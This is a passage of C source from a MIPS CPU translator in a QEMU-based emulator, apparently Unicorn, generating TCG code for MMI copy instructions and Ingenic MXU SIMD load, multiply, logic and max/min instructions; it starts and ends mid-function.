tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1); tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_mmr[rt], mask); tcg_gen_movi_i64(tcg_ctx, t1, 0); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_shli_i64(tcg_ctx, t0, t0, 16); tcg_gen_or_i64(tcg_ctx, t1, t0, t1); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } } /* * PCPYLD rd, rs, rt * * Parallel Copy Lower Doubleword * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---------+---------+-----------+ * | MMI | rs | rt | rd | PCPYLD | MMI2 | * +-----------+---------+---------+---------+---------+-----------+ */ static void gen_mmi_pcpyld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t rs, rt, rd; uint32_t opcode; opcode = ctx->opcode; rs = extract32(opcode, 21, 5); rt = extract32(opcode, 16, 5); rd = extract32(opcode, 11, 5); if (rd == 0) { /* nop */ } else { if (rs == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], 0); } else { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], tcg_ctx->cpu_gpr[rs]); } if (rt == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } else { if (rd != rt) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } } } } /* * PCPYUD rd, rs, rt * * Parallel Copy Upper Doubleword * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---------+---------+-----------+ * | MMI | rs | rt | rd | PCPYUD | MMI3 | * +-----------+---------+---------+---------+---------+-----------+ */ static void gen_mmi_pcpyud(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t rs, rt, rd; uint32_t opcode; opcode = ctx->opcode; rs = extract32(opcode, 21, 5); rt = extract32(opcode, 16, 5); rd = extract32(opcode, 11, 5); if (rd == 0) { /* nop */ } else { if (rs == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } else { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_mmr[rs]); } if (rt == 0) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], 0); } else { if (rd != rt) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_mmr[rd], tcg_ctx->cpu_mmr[rt]); } } } } #endif #if !defined(TARGET_MIPS64) /* MXU accumulate add/subtract 1-bit pattern 'aptn1' */ #define MXU_APTN1_A 0 #define MXU_APTN1_S 1 /* MXU accumulate add/subtract 2-bit pattern 'aptn2' */ #define MXU_APTN2_AA 0 #define MXU_APTN2_AS 1 #define MXU_APTN2_SA 2 #define MXU_APTN2_SS 3 /* MXU execute add/subtract 2-bit pattern 'eptn2' */ #define MXU_EPTN2_AA 0 #define MXU_EPTN2_AS 1 #define MXU_EPTN2_SA 2 #define MXU_EPTN2_SS 3 /* MXU operand getting pattern 'optn2' */ #define MXU_OPTN2_PTN0 0 #define MXU_OPTN2_PTN1 1 #define MXU_OPTN2_PTN2 2 #define MXU_OPTN2_PTN3 3 /* alternative naming scheme for 'optn2' */ #define MXU_OPTN2_WW 0 #define MXU_OPTN2_LW 1 #define MXU_OPTN2_HW 2 #define MXU_OPTN2_XW 3 /* MXU operand getting pattern 'optn3' */ #define MXU_OPTN3_PTN0 0 #define MXU_OPTN3_PTN1 1 #define MXU_OPTN3_PTN2 2 #define MXU_OPTN3_PTN3 3 #define MXU_OPTN3_PTN4 4 #define MXU_OPTN3_PTN5 5 #define MXU_OPTN3_PTN6 6 #define MXU_OPTN3_PTN7 7 /* * S32I2M XRa, rb - Register move from GRF to XRF */ static void gen_mxu_s32i2m(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; uint32_t XRa, Rb; t0 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 5); Rb = extract32(ctx->opcode, 16, 5); gen_load_gpr(tcg_ctx, t0, Rb); if (XRa <= 15) { gen_store_mxu_gpr(tcg_ctx, t0, XRa); } else if (XRa == 16) { gen_store_mxu_cr(tcg_ctx, t0); } tcg_temp_free(tcg_ctx, t0); } /* * S32M2I XRa, rb - Register move from XRF to GRF */ static void gen_mxu_s32m2i(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; uint32_t XRa, Rb; t0 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 5); Rb = extract32(ctx->opcode, 16, 5); if (XRa <= 15) { gen_load_mxu_gpr(tcg_ctx, t0, XRa); } else if (XRa == 16) { gen_load_mxu_cr(tcg_ctx, t0); } gen_store_gpr(tcg_ctx, t0, Rb); tcg_temp_free(tcg_ctx, t0); } /* * S8LDD XRa, Rb, s8, optn3 - Load a byte from memory to XRF */ static void gen_mxu_s8ldd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; uint32_t XRa, Rb, s8, optn3; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); s8 = extract32(ctx->opcode, 10, 8); optn3 = extract32(ctx->opcode, 18, 3); Rb = extract32(ctx->opcode, 21, 5); gen_load_gpr(tcg_ctx, t0, Rb); tcg_gen_addi_tl(tcg_ctx, t0, t0, (int8_t)s8); switch (optn3) { /* XRa[7:0] = tmp8 */ case MXU_OPTN3_PTN0: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 0, 8); break; /* XRa[15:8] = tmp8 */ case MXU_OPTN3_PTN1: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 8, 8); break; /* XRa[23:16] = tmp8 */ case MXU_OPTN3_PTN2: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 16, 8); break; /* XRa[31:24] = tmp8 */ case MXU_OPTN3_PTN3: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); gen_load_mxu_gpr(tcg_ctx, t0, XRa); tcg_gen_deposit_tl(tcg_ctx, t0, t0, t1, 24, 8); break; /* XRa = {8'b0, tmp8, 8'b0, tmp8} */ case MXU_OPTN3_PTN4: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); tcg_gen_deposit_tl(tcg_ctx, t0, t1, t1, 16, 16); break; /* XRa = {tmp8, 8'b0, tmp8, 8'b0} */ case MXU_OPTN3_PTN5: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); tcg_gen_shli_tl(tcg_ctx, t1, t1, 8); tcg_gen_deposit_tl(tcg_ctx, t0, t1, t1, 16, 16); break; /* XRa = {{8{sign of tmp8}}, tmp8, {8{sign of tmp8}}, tmp8} */ case MXU_OPTN3_PTN6: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_SB); tcg_gen_mov_tl(tcg_ctx, t0, t1); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0xFF00FFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 16); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); break; /* XRa = {tmp8, tmp8, tmp8, tmp8} */ case MXU_OPTN3_PTN7: tcg_gen_qemu_ld_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_UB); tcg_gen_deposit_tl(tcg_ctx, t1, t1, t1, 8, 8); tcg_gen_deposit_tl(tcg_ctx, t0, t1, t1, 16, 16); break; } gen_store_mxu_gpr(tcg_ctx, t0, XRa); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* * D16MUL XRa, XRb, XRc, XRd, optn2 - Signed 16 bit pattern multiplication */ static void gen_mxu_d16mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2, t3; uint32_t XRa, XRb, XRc, XRd, optn2; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); t3 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); XRb = extract32(ctx->opcode, 10, 4); XRc = extract32(ctx->opcode, 14, 4); XRd = extract32(ctx->opcode, 18, 4); optn2 = extract32(ctx->opcode, 22, 2); gen_load_mxu_gpr(tcg_ctx, t1, XRb); tcg_gen_sextract_tl(tcg_ctx, t0, t1, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t1, t1, 16, 16); gen_load_mxu_gpr(tcg_ctx, t3, XRc); tcg_gen_sextract_tl(tcg_ctx, t2, t3, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t3, t3, 16, 16); switch (optn2) { case MXU_OPTN2_WW: /* XRB.H*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_LW: /* XRB.L*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_HW: /* XRB.H*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; case MXU_OPTN2_XW: /* XRB.L*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; } gen_store_mxu_gpr(tcg_ctx, t3, XRa); gen_store_mxu_gpr(tcg_ctx, t2, XRd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); } /* * D16MAC XRa, XRb, XRc, XRd, aptn2, optn2 - Signed 16 bit pattern multiply * and accumulate */ static void gen_mxu_d16mac(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2, t3; uint32_t XRa, XRb, XRc, XRd, optn2, aptn2; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); t3 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); XRb = extract32(ctx->opcode, 10, 4); XRc = extract32(ctx->opcode, 14, 4); XRd = extract32(ctx->opcode, 18, 4); optn2 = extract32(ctx->opcode, 22, 2); aptn2 = extract32(ctx->opcode, 24, 2); gen_load_mxu_gpr(tcg_ctx, t1, XRb); tcg_gen_sextract_tl(tcg_ctx, t0, t1, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t1, t1, 16, 16); gen_load_mxu_gpr(tcg_ctx, t3, XRc); tcg_gen_sextract_tl(tcg_ctx, t2, t3, 0, 16); tcg_gen_sextract_tl(tcg_ctx, t3, t3, 16, 16); switch (optn2) { case MXU_OPTN2_WW: /* XRB.H*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_LW: /* XRB.L*XRC.H == lop, XRB.L*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t0, t2); break; case MXU_OPTN2_HW: /* XRB.H*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t1, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; case MXU_OPTN2_XW: /* XRB.L*XRC.H == lop, XRB.H*XRC.L == rop */ tcg_gen_mul_tl(tcg_ctx, t3, t0, t3); tcg_gen_mul_tl(tcg_ctx, t2, t1, t2); break; } gen_load_mxu_gpr(tcg_ctx, t0, XRa); gen_load_mxu_gpr(tcg_ctx, t1, XRd); switch (aptn2) { case MXU_APTN2_AA: tcg_gen_add_tl(tcg_ctx, t3, t0, t3); tcg_gen_add_tl(tcg_ctx, t2, t1, t2); break; case MXU_APTN2_AS: tcg_gen_add_tl(tcg_ctx, t3, t0, t3); tcg_gen_sub_tl(tcg_ctx, t2, t1, t2); break; case MXU_APTN2_SA: tcg_gen_sub_tl(tcg_ctx, t3, t0, t3); tcg_gen_add_tl(tcg_ctx, t2, t1, t2); break; case MXU_APTN2_SS: tcg_gen_sub_tl(tcg_ctx, t3, t0, t3); tcg_gen_sub_tl(tcg_ctx, t2, t1, t2); break; } gen_store_mxu_gpr(tcg_ctx, t3, XRa); gen_store_mxu_gpr(tcg_ctx, t2, XRd); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); } /* * Q8MUL XRa, XRb, XRc, XRd - Parallel unsigned 8 bit pattern multiply * Q8MULSU XRa, XRb, XRc, XRd - Parallel signed 8 bit pattern multiply */ static void gen_mxu_q8mul_q8mulsu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2, t3, t4, t5, t6, t7; uint32_t XRa, XRb, XRc, XRd, sel; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); t3 = tcg_temp_new(tcg_ctx); t4 = tcg_temp_new(tcg_ctx); t5 = tcg_temp_new(tcg_ctx); t6 = tcg_temp_new(tcg_ctx); t7 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); XRb = extract32(ctx->opcode, 10, 4); XRc = extract32(ctx->opcode, 14, 4); XRd = extract32(ctx->opcode, 18, 4); sel = extract32(ctx->opcode, 22, 2); gen_load_mxu_gpr(tcg_ctx, t3, XRb); gen_load_mxu_gpr(tcg_ctx, t7, XRc); if (sel == 0x2) { /* Q8MULSU */ tcg_gen_ext8s_tl(tcg_ctx, t0, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8s_tl(tcg_ctx, t1, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8s_tl(tcg_ctx, t2, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8s_tl(tcg_ctx, t3, t3); } else { /* Q8MUL */ tcg_gen_ext8u_tl(tcg_ctx, t0, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8u_tl(tcg_ctx, t1, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8u_tl(tcg_ctx, t2, t3); tcg_gen_shri_tl(tcg_ctx, t3, t3, 8); tcg_gen_ext8u_tl(tcg_ctx, t3, t3); } tcg_gen_ext8u_tl(tcg_ctx, t4, t7); tcg_gen_shri_tl(tcg_ctx, t7, t7, 8); tcg_gen_ext8u_tl(tcg_ctx, t5, t7); tcg_gen_shri_tl(tcg_ctx, t7, t7, 8); tcg_gen_ext8u_tl(tcg_ctx, t6, t7); tcg_gen_shri_tl(tcg_ctx, t7, t7, 8); tcg_gen_ext8u_tl(tcg_ctx, t7, t7); tcg_gen_mul_tl(tcg_ctx, t0, t0, t4); tcg_gen_mul_tl(tcg_ctx, t1, t1, t5); tcg_gen_mul_tl(tcg_ctx, t2, t2, t6); tcg_gen_mul_tl(tcg_ctx, t3, t3, t7); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0xFFFF); tcg_gen_andi_tl(tcg_ctx, t1, t1, 0xFFFF); tcg_gen_andi_tl(tcg_ctx, t2, t2, 0xFFFF); tcg_gen_andi_tl(tcg_ctx, t3, t3, 0xFFFF); tcg_gen_shli_tl(tcg_ctx, t1, t1, 16); tcg_gen_shli_tl(tcg_ctx, t3, t3, 16); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_or_tl(tcg_ctx, t1, t2, t3); gen_store_mxu_gpr(tcg_ctx, t0, XRd); gen_store_mxu_gpr(tcg_ctx, t1, XRa); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t4); tcg_temp_free(tcg_ctx, t5); tcg_temp_free(tcg_ctx, t6); tcg_temp_free(tcg_ctx, t7); } /* * S32LDD XRa, Rb, S12 - Load a word from memory to XRF * S32LDDR XRa, Rb, S12 - Load a word from memory to XRF, reversed byte seq. */ static void gen_mxu_s32ldd_s32lddr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; uint32_t XRa, Rb, s12, sel; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); XRa = extract32(ctx->opcode, 6, 4); s12 = extract32(ctx->opcode, 10, 10); sel = extract32(ctx->opcode, 20, 1); Rb = extract32(ctx->opcode, 21, 5); gen_load_gpr(tcg_ctx, t0, Rb); tcg_gen_movi_tl(tcg_ctx, t1, s12); tcg_gen_shli_tl(tcg_ctx, t1, t1, 2); if (s12 & 0x200) { tcg_gen_ori_tl(tcg_ctx, t1, t1, 0xFFFFF000); } tcg_gen_add_tl(tcg_ctx, t1, t0, t1); tcg_gen_qemu_ld_tl(tcg_ctx, t1, t1, ctx->mem_idx, MO_SL); if (sel == 1) { /* S32LDDR */ tcg_gen_bswap32_tl(tcg_ctx, t1, t1); } gen_store_mxu_gpr(tcg_ctx, t1, XRa); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* * MXU instruction category: logic * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * S32NOR S32AND S32OR S32XOR */ /* * S32NOR XRa, XRb, XRc * Update XRa with the result of logical bitwise 'nor' operation * applied to the content of XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32NOR(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 1s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0xFFFFFFFF); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just set destination to the negation of XRc */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else if (unlikely(XRc == 0)) { /* XRa zero register -> just set destination to the negation of XRb */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to the negation of XRb */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ tcg_gen_nor_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * S32AND XRa, XRb, XRc * Update XRa with the result of logical bitwise 'and' operation * applied to the content of XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32AND(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) || (XRc == 0))) { /* one of operands zero register -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ tcg_gen_and_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * S32OR XRa, XRb, XRc * Update XRa with the result of logical bitwise 'or' operation * applied to the content of XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32OR(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just set destination to the content of XRc */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else if (unlikely(XRc == 0)) { /* XRc zero register -> just set destination to the content of XRb */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * S32XOR XRa, XRb, XRc * Update XRa with the result of logical bitwise 'xor' operation * applied to the content of XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL16| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32XOR(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just set destination to the content of XRc */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else if (unlikely(XRc == 0)) { /* XRc zero register -> just set destination to the content of XRb */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else { /* the most general case */ tcg_gen_xor_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } /* * MXU instruction category max/min * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * S32MAX D16MAX Q8MAX * S32MIN D16MIN Q8MIN */ /* * S32MAX XRa, XRb, XRc * Update XRa with the maximum of signed 32-bit integers contained * in XRb and XRc. * * S32MIN XRa, XRb, XRc * Update XRa with the minimum of signed 32-bit integers contained * in XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_S32MAX_S32MIN(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, opc, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); opc = extract32(ctx->opcode, 18, 3); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to zero */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely((XRb == 0) || (XRc == 0))) { /* exactly one operand is zero register - find which one is not...*/ uint32_t XRx = XRb ? XRb : XRc; /* ...and do max/min operation with one operand 0 */ if (opc == OPC_MXU_S32MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRx - 1], 0); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRx - 1], 0); } } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ if (opc == OPC_MXU_S32MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], tcg_ctx->mxu_gpr[XRc - 1]); } } } /* * D16MAX * Update XRa with the 16-bit-wise maximums of signed integers * contained in XRb and XRc. * * D16MIN * Update XRa with the 16-bit-wise minimums of signed integers * contained in XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_D16MAX_D16MIN(DisasContext *ctx) { TCGContext 